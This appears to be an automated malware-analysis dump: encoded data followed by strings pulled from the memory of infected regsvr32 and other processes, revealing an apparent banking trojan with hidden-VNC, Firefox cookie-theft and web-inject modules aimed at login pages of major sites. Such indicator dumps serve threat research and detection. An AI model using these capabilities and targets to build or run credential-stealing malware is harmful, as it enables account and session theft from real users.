sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c 
GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 
x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_3264_rwx_009B0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
%System%\regsvr32.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

regsvr32.exe_3264_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

new.exe_3664:

.text
`.rdata
@.data
a%FnQU
GetProcessHeap
KERNEL32.dll
EnumChildWindows
EnumWindows
USER32.dll
\d.nC
v1%ULRg
]j'
)%uj>_
.io*U
dxKeY
ntdll.dll
setup.dat

regsvr32.exe_3384_rwx_00070000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data

regsvr32.exe_3384_rwx_000D0000_000C0000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
